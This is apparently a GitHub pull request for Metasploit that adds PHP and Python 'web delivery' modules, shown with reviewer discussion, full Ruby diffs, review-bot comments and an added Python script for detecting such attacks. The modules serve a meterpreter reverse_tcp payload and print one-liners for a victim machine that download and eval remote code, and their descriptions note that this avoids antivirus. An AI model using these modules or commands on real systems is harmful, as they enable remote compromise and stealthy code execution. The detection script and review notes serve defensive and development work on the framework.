
Addition of php web delivery and python web delivery #3018

Closed
wants to merge 11 commits into from

6 participants

@jakxx

Module stands up a web server and serves a payload much like psh_web_delivery. This PR adds support for both PHP and Python.

@jakxx

Not sure what to do about disclosure date in this case. First PR to msf so go easy on me :)

@zeroSteiner
Collaborator

@Meatballs1 Do you think it would be beneficial to combine these with your psh_web_delivery module into one like multi/misc/script_web_delivery? It looks like it could be accomplished by adding additional targets.

@jakxx

Yea I thought about that as well. Didn't know if it would be better to keep them separate or try combining them.

@Meatballs1
Collaborator

@nullbind has done something similar. But I was thinking that maybe payloads should contain the logic for download+eval similar to your arch_cmd changes @zerosteiner. Potentially they could do some kind of arch_cmd_web?? Or maybe this should be implemented as a stager for each respective arch?

Powershell is currently a special case as it is more like an encoder than a payload (we choose a native payload). But it hasn't been formalised as either of these yet.

It's definitely useful to have a handy delivery mechanism like this, just need some thought about how best we can implement it to make it flexible. I was surprised how much and how differently the psh_web_delivery could be used but also want to be able to slot that style into psh cmd exploits where space is limited or badchars mean it has to be b64 enc etc.

@jakxx

@Meatballs1 I like the idea of integrating it into payloads. At the same time, the current architecture just makes it so flexible. Excellent for scenarios where MSF was not used to gain initial command exec.

@wchen-r7
Collaborator

IMO they look like payloads+handlers. I'm not sure if they should be considered as exploits.

@jakxx

I am good with however you guys want to implement them. Just let me know what I need to do.

@jakxx

@wchen-r7 @Meatballs1 Any more thoughts on this?? I am kinda leaning towards @zeroSteiner's idea of a multi/misc/script_web_delivery

@Meatballs1
Collaborator

Here is @nullbind's example: https://github.com/pwnwiki/q/blob/master/modules/exploits/netspi/ps_webshells.rb
Which is along the lines of a script_web_delivery.

I think people would find it useful, I'm surprised at the number of ways people have used psh_web_delivery

@jakxx

@Meatballs1 Awesome. I am close to having a new PR ready. Should I incorporate the powershell option or leave that as a standalone module?

@Meatballs1
Collaborator

I don't see a reason to keep it standalone if it reduces the amount of duplicate code

@todb-r7 todb-r7 added the module label
@jakxx jakxx referenced this pull request
Merged

Script web delivery #3419

@jakxx

Closing for updated PR #3419

@jakxx jakxx closed this
@mwulftange mwulftange commented on the diff
modules/exploits/multi/php/php_web_delivery.rb
((44 lines not shown))
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} ?>|
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+ print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")

Generally, you don’t need .exe when calling a proper executable in Windows shell. So the first would suffice for both systems.

@mwulftange mwulftange commented on the diff
modules/exploits/multi/python/py_web_delivery.rb
((44 lines not shown))
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} |
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")

Same as above.

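As an added, defender-side example that is not part of this PR or of the framework: the one-liners the two modules' primer prints (php -r with eval(file_get_contents(...)), python -c with urllib2.urlopen and exec) show up verbatim in process-creation telemetry, so a detection can key on an interpreter launched with an inline-code flag whose code both fetches over HTTP and evaluates the result. The "pid image command_line" record format and the addresses are constructed assumptions, not real logs.

```python
import re
from dataclasses import dataclass

# Constructed process-creation records, "pid image command_line" (not real telemetry).
SAMPLE_LOG = [
    '1201 php     php -r "eval(file_get_contents(\'http://192.0.2.10:8080/abc\'));"',
    '1202 python  python -c "import urllib2; r = urllib2.urlopen(\'http://192.0.2.10:8080/abc\'); exec(r.read());"',
    '1203 php     php -r "echo phpversion();"',
    '1204 python  python -c "print(\'hello\')"',
    '1205 python  python3 -c "import urllib.request as u; exec(u.urlopen(\'http://192.0.2.10/x\').read())"',
]

# Interpreter started with an inline-code flag: php -r ... or python -c ... (with or without .exe).
INTERPRETER = re.compile(r"(?:^|[\\/\s])(php|python[23]?)(?:\.exe)?\s+-(?:r|c)\s", re.I)
# Code that pulls content over HTTP inside the one-liner.
FETCH = re.compile(r"file_get_contents\s*\(\s*['\"]https?://|\burlopen\s*\(|\burllib2?\b", re.I)
# Code that evaluates whatever was fetched.
EVAL = re.compile(r"\b(?:eval|exec)\s*\(", re.I)

@dataclass
class Finding:
    pid: int
    interpreter: str
    reason: str

def parse_record(line):
    """Split a constructed 'pid image command_line' record into its three fields."""
    pid, image, cmdline = line.split(None, 2)
    return int(pid), image, cmdline

def classify(cmdline):
    """Return (interpreter, reason) when the command line looks like fetch-and-eval, else None."""
    m = INTERPRETER.search(cmdline)
    if not m or not FETCH.search(cmdline) or not EVAL.search(cmdline):
        return None
    return m.group(1).lower(), "inline script downloads code over HTTP and evaluates it"

def find_web_delivery(lines):
    """Scan records and return a Finding for each fetch-and-eval interpreter launch."""
    findings = []
    for line in lines:
        pid, _image, cmdline = parse_record(line)
        hit = classify(cmdline)
        if hit:
            findings.append(Finding(pid, hit[0], hit[1]))
    return findings

if __name__ == "__main__":
    for f in find_web_delivery(SAMPLE_LOG):
        print(f"pid {f.pid}: {f.interpreter} {f.reason}")
```

Benign inline scripts (records 1203 and 1204) are ignored because they lack either the HTTP fetch or the eval; the python3 variant is caught as well, which matters because urllib2 only exists under Python 2.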
Commits on Jul 19, 2013
  1. @jakxx

    Added powershell psexec module

    jakxx authored
  2. @jakxx

    Removed Revision

    jakxx authored
Commits on Jul 22, 2013
  1. @jakxx
Commits on Jul 25, 2013
  1. @jakxx

    Updated Description

    jakxx authored
Commits on Feb 20, 2014
  1. @jakxx
  2. @jakxx

    Delete powershell_psexec.rb

    jakxx authored
  3. @jakxx

    Added php_web_delivery

    jakxx authored
Commits on Feb 21, 2014
  1. @jakxx

    Added py_web_delivery

    jakxx authored
  2. @jakxx

    Updating References

    jakxx authored
  3. @jakxx

    Updating References

    jakxx authored
Commits on Jun 2, 2014
  1. @jakxx
62 modules/exploits/multi/php/php_web_delivery.rb
@@ -0,0 +1,62 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'PHP Payload Web Delivery',
+ 'Description' => %q{
+ This module quickly fires up a web server that serves a PHP payload.
+ The provided command will start PHP and then download and execute the
+ payload. The main purpose of this module is to quickly establish a session on a target
+ machine when the attacker has to manually type in the command himself, e.g. Command Injection,
+ RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
+ write to disk so is less likely to trigger AV solutions.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>',
+ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'php/meterpreter/reverse_tcp'
+ },
+ 'References' =>
+ [
+ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html']
+ [ 'URL', 'http://us1.php.net/eval']
+ [ 'URL', 'http://us1.php.net/file_get_contents']
+ ],
+ 'Platform' => 'php',
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} ?>|
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: php -r \"eval(file_get_contents('#{url}'));\"")
+ print_line("For Windows: php.exe -r \"eval(file_get_contents('#{url}'));\"")
+ end
+end
+
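Review bot: the 'References' array in this hunk is missing the commas between its three entries ([ 'URL', '...blogspot.com/2014/02/php-meterpreter-web-delivery.html'], [ 'URL', 'http://us1.php.net/eval'], [ 'URL', 'http://us1.php.net/file_get_contents']), so Ruby will not parse the file; add a comma after each element. In the same metadata block, the header comment reads "http//metasploit.com/download" (missing colon), 'DisclosureDate' => 'N/A' is better omitted than set to a non-date since the framework and msftidy expect a parseable date when the key is present, and no 'Arch' is declared, so confirm that the default php/meterpreter/reverse_tcp payload is actually selectable or add 'Arch' => ARCH_PHP. In on_request_uri, the "?>" appended to payload.encoded is harmless but unnecessary for code run through eval(), which already starts in PHP mode; the request argument is unused and the requesting client is never logged, so printing cli.peerhost alongside "Delivering Payload" would let the operator confirm which host fetched the payload.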
61 modules/exploits/multi/python/py_web_delivery.rb
@@ -0,0 +1,61 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = NormalRanking
+
+ include Msf::Exploit::Remote::HttpServer
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Python Payload Web Delivery',
+ 'Description' => %q{
+ This module quickly fires up a web server that serves a Python payload.
+ The provided command will start Python and then download and execute the
+ payload. The main purpose of this module is to quickly establish a session on a target
+ machine when the attacker has to manually type in the command himself, e.g. Command Injection,
+ RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not
+ write to disk so is less likely to trigger AV solutions and will allow privilege
+ escalations supplied by Meterpreter.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Andrew Smith "jakx_" <jakx.ppr@gmail.com>',
+ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' #Idea for module structure
+ ],
+ 'DefaultOptions' =>
+ {
+ 'Payload' => 'python/meterpreter/reverse_tcp'
+ },
+ 'References' =>
+ [
+ [ 'URL', 'http://securitypadawan.blogspot.com/2014/02/php-meterpreter-web-delivery.html']
+ [ 'URL', 'http://docs.python.org/2/library/urllib2.html']
+ ],
+ 'Platform' => 'py',
+ 'Targets' =>
+ [
+ ['Automatic Targeting', { 'auto' => true }]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'N/A'))
+ end
+
+ def on_request_uri(cli, request)
+ print_status("Delivering Payload")
+ data = %Q|#{payload.encoded} |
+ send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+ end
+
+ def primer
+ url = get_uri()
+ print_status("Run the following command on the target machine:")
+ print_line("For Linux: python -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ print_line("For Windows: python.exe -c \"import urllib2; r = urllib2.urlopen('#{url}'); exec(r.read());\"")
+ end
+end
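Review bot: the commands printed by primer only work under Python 2: urllib2 does not exist in Python 3, where the equivalent is urllib.request.urlopen, so a host with only python3 on the path fails with an ImportError; either state the Python 2 requirement in the Description or print a variant that tries both imports. The same two defects as the PHP module recur here: 'References' is missing the comma between its two entries (a syntax error) and the header comment has "http//" without the colon. In on_request_uri, %Q|#{payload.encoded} | only adds a trailing space; payload.encoded alone is clearer. 'Platform' => 'py' should be checked against the framework's python payloads, which declare 'python', and no 'Arch' (ARCH_PYTHON) is given, so verify that python/meterpreter/reverse_tcp is selectable. Finally, the Description's claim that the vector "will allow privilege escalations supplied by Meterpreter" is unsupported by this module, which only delivers the payload, so trim that sentence.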